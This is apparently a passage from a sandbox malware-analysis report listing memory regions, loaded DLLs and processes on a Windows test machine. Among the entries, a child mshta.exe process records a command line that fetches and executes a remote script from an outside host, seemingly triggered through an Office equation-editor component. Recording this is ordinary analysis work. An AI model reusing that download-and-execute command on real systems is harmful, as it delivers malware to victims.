"\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 377 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 378 start_va = 0x77120000 end_va = 0x77176fff entry_point = 0x77120000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 379 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 380 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 381 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 382 start_va = 0x76470000 end_va = 0x7648efff entry_point = 0x76470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 383 start_va = 0x76b40000 end_va = 0x76c0bfff entry_point = 0x76b40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 384 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 385 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 386 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 387 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 388 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 389 start_va = 0x12f0000 end_va = 0x12fffff entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 390 start_va = 0x1300000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 391 start_va = 0x70cd0000 end_va = 0x70f0ffff entry_point = 0x70cd0000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 392 start_va = 0x3de20000 end_va = 0x3de2dfff entry_point = 0x3de20000 region_type = mapped_file name = "eeintl.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll") Region: id = 393 start_va = 0x74ff0000 end_va = 0x74ffbfff entry_point = 0x74ff0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 394 start_va = 0x73f00000 end_va = 0x73f3ffff entry_point = 0x73f00000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 395 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 396 start_va = 0x11a0000 end_va = 0x127efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 397 start_va = 0x18f0000 end_va = 0x192ffff entry_point = 0x0 region_type = private name = "private_0x00000000018f0000" filename = "" Region: id = 398 start_va = 0x75580000 end_va = 0x7560efff entry_point = 0x75580000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 399 start_va = 0x76ab0000 end_va = 0x76b32fff entry_point = 0x76ab0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 400 start_va = 0x1700000 end_va = 0x17fffff entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 401 start_va = 0x1930000 end_va = 0x1a2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001930000" filename = "" Region: id = 402 start_va = 0x74b70000 end_va = 0x74b85fff entry_point = 0x74b70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 403 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 404 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 405 start_va = 0x74910000 end_va = 0x7494afff entry_point = 0x74910000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 406 start_va = 0x1a30000 end_va = 0x1cfefff entry_point = 0x1a30000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 407 start_va = 0x75090000 end_va = 0x7509dfff entry_point = 0x75090000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 408 start_va = 0x1e0000 end_va = 0x1e6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 409 start_va = 0x3e0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 410 start_va = 0x1800000 end_va = 0x187ffff entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 411 start_va = 0x1d00000 end_va = 0x1dfffff entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 412 start_va = 0x1e00000 end_va = 0x1efffff entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 413 start_va = 0x1f00000 end_va = 0x1fbffff entry_point = 0x1f00000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 414 start_va = 0x20c0000 end_va = 0x20fffff entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 415 start_va = 0x73bd0000 end_va = 0x73be2fff entry_point = 0x73bd0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 416 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 417 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Thread: id = 13 os_tid = 0x9f8 Thread: id = 14 os_tid = 0x9fc Thread: id = 15 os_tid = 0xa00 Thread: id = 16 os_tid = 0xa04 Thread: id = 17 os_tid = 0xa08 Process: id = "3" image_name = "mshta.exe" filename = "c:\\windows\\system32\\mshta.exe" page_root = "0x7f1e66a0" os_pid = "0xa18" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x9f4" cmd_line = "mShta http://doc2th.com/tin/foobaz.txt &AAAA\x12\x0cC" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f46e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 418 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 419 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 420 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 421 start_va = 0x2b0000 end_va = 0x2befff entry_point = 0x2b0000 region_type = mapped_file name = "mshta.exe" filename = "\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe") Region: id = 422 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 423 start_va = 0x76f50000 end_va = 0x7708bfff entry_point = 0x76f50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 424 start_va = 0x77190000 end_va = 0x77190fff entry_point = 0x77190000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 425 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 426 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 427 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 428 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 429 start_va = 0x75260000 end_va = 0x752a9fff entry_point = 0x75260000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 430 start_va = 0x76c10000 end_va = 0x76ce3fff entry_point = 0x76c10000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 431 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 432 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 433 start_va = 0x75420000 end_va = 0x754c0fff entry_point = 0x75420000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 434 start_va = 0x754d0000 end_va = 0x7556ffff entry_point = 0x754d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 435 start_va = 0x768f0000 end_va = 0x76908fff entry_point = 0x768f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 436 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 437 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 438 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 439 start_va = 0x410000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 440 start_va = 0x63150000 end_va = 0x63706fff entry_point = 0x63150000 region_type = mapped_file name = "mshtml.dll" filename = "\\Windows\\System32\\mshtml.dll" (normalized: "c:\\windows\\system32\\mshtml.dll") Region: id = 441 start_va = 0x77110000 end_va = 0x77114fff entry_point = 0x77110000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 442 start_va = 0x765d0000 end_va = 0x7661dfff entry_point = 0x765d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 443 start_va = 0x76620000 end_va = 0x766e8fff entry_point = 0x76620000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 444 start_va = 0x76460000 end_va = 0x76469fff entry_point = 0x76460000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 445 start_va = 0x76850000 end_va = 0x768ecfff entry_point = 0x76850000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 446 start_va = 0x766f0000 end_va = 0x7684bfff entry_point = 0x766f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 447 start_va = 0x76490000 end_va = 0x765c5fff entry_point = 0x76490000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 448 start_va = 0x76cf0000 end_va = 0x76de4fff entry_point = 0x76cf0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 449 start_va = 0x77120000 end_va = 0x77176fff entry_point = 0x77120000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 450 start_va = 0x75610000 end_va = 0x7580afff entry_point = 0x75610000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 451 start_va = 0x75580000 end_va = 0x7560efff entry_point = 0x75580000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 452 start_va = 0x75120000 end_va = 0x7523cfff entry_point = 0x75120000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 453 start_va = 0x75110000 end_va = 0x7511bfff entry_point = 0x75110000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 454 start_va = 0x6eaa0000 end_va = 0x6eac9fff entry_point = 0x6eaa0000 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 455 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 456 start_va = 0xc0000 end_va = 0xdcfff entry_point = 0xc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 457 start_va = 0x410000 end_va = 0x4d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 458 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 459 start_va = 0xc0000 end_va = 0xdcfff entry_point = 0xc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 460 start_va = 0x76470000 end_va = 0x7648efff entry_point = 0x76470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 461 start_va = 0x76b40000 end_va = 0x76c0bfff entry_point = 0x76b40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 462 start_va = 0x5a0000 end_va = 0x6a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 463 start_va = 0x6b0000 end_va = 0x12affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 464 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 465 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 466 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0xd0000 region_type = mapped_file name = "mshta.exe.mui" filename = "\\Windows\\System32\\en-US\\mshta.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\mshta.exe.mui") Region: id = 467 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 468 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 469 start_va = 0x74ff0000 end_va = 0x74ffbfff entry_point = 0x74ff0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 470 start_va = 0x13f0000 end_va = 0x14effff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 471 start_va = 0x737f0000 end_va = 0x73810fff entry_point = 0x737f0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 472 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 473 start_va = 0x76df0000 end_va = 0x76e34fff entry_point = 0x76df0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 474 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 475 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 476 start_va = 0x220000 end_va = 0x27bfff entry_point = 0x220000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 477 start_va = 0x220000 end_va = 0x27bfff entry_point = 0x220000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 478 start_va = 0x73f00000 end_va = 0x73f3ffff entry_point = 0x73f00000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 479 start_va = 0x220000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 480 start_va = 0x12b0000 end_va = 0x138efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012b0000" filename = "" Region: id = 481 start_va = 0x73bd0000 end_va = 0x73be2fff entry_point = 0x73bd0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 482 start_va = 0x14f0000 end_va = 0x17befff entry_point = 0x14f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 483 start_va = 0x260000 end_va = 0x267fff entry_point = 0x260000 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui") Region: id = 484 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 485 start_va = 0x76ab0000 end_va = 0x76b32fff entry_point = 0x76ab0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 486 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 487 start_va = 0x290000 end_va = 0x290fff entry_point = 0x290000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 488 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 489 start_va = 0x74080000 end_va = 0x7421dfff entry_point = 0x74080000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 490 start_va = 0x290000 end_va = 0x290fff entry_point = 0x290000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 491 start_va = 0x2c0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 492 start_va = 0x74fd0000 end_va = 0x74feafff entry_point = 0x74fd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 493 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 494 start_va = 0x2d0000 end_va = 0x2d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 495 start_va = 0x75810000 end_va = 0x76459fff entry_point = 0x75810000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 496 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 497 start_va = 0x750a0000 end_va = 0x750aafff entry_point = 0x750a0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 498 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x2f0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 499 start_va = 0x300000 end_va = 0x307fff entry_point = 0x300000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 500 start_va = 0x4e0000 end_va = 0x4ebfff entry_point = 0x4e0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 501 start_va = 0x770d0000 end_va = 0x77104fff entry_point = 0x770d0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 502 start_va = 0x77090000 end_va = 0x77095fff entry_point = 0x77090000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 503 start_va = 0x4f0000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 504 start_va = 0x749f0000 end_va = 0x74a33fff entry_point = 0x749f0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 505 start_va = 0x17c0000 end_va = 0x19effff entry_point = 0x0 region_type = private name = "private_0x00000000017c0000" filename = "" Region: id = 506 start_va = 0x733c0000 end_va = 0x733dbfff entry_point = 0x733c0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 507 start_va = 0x733b0000 end_va = 0x733b6fff entry_point = 0x733b0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 508 start_va = 0x1a30000 end_va = 0x1b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a30000" filename = "" Region: id = 509 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 510 start_va = 0x72930000 end_va = 0x72981fff entry_point = 0x72930000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 511 start_va = 0x72910000 end_va = 0x72924fff entry_point = 0x72910000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 512 start_va = 0x73820000 end_va = 0x7382cfff entry_point = 0x73820000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 513 start_va = 0x1860000 end_va = 0x195ffff entry_point = 0x0 region_type = private name = "private_0x0000000001860000" filename = "" Region: id = 514 start_va = 0x19b0000 end_va = 0x19effff entry_point = 0x0 region_type = private name = "private_0x00000000019b0000" filename = "" Region: id = 515 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 516 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 517 start_va = 0x500000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 518 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 519 start_va = 0x72280000 end_va = 0x72285fff entry_point = 0x72280000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 520 start_va = 0x1cd0000 end_va = 0x1dcffff entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 521 start_va = 0x734e0000 end_va = 0x734effff entry_point = 0x734e0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 522 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 523 start_va = 0x1b30000 end_va = 0x1c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b30000" filename = "" Region: id = 524 start_va = 0x1dd0000 end_va = 0x1f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 525 start_va = 0x1b30000 end_va = 0x1c6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b30000" filename = "" Region: id = 526 start_va = 0x1c80000 end_va = 0x1c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 527 start_va = 0x6f010000 end_va = 0x6f015fff entry_point = 0x6f010000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 528 start_va = 0x1b30000 end_va = 0x1c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b30000" filename = "" Region: id = 529 start_va = 0x1dd0000 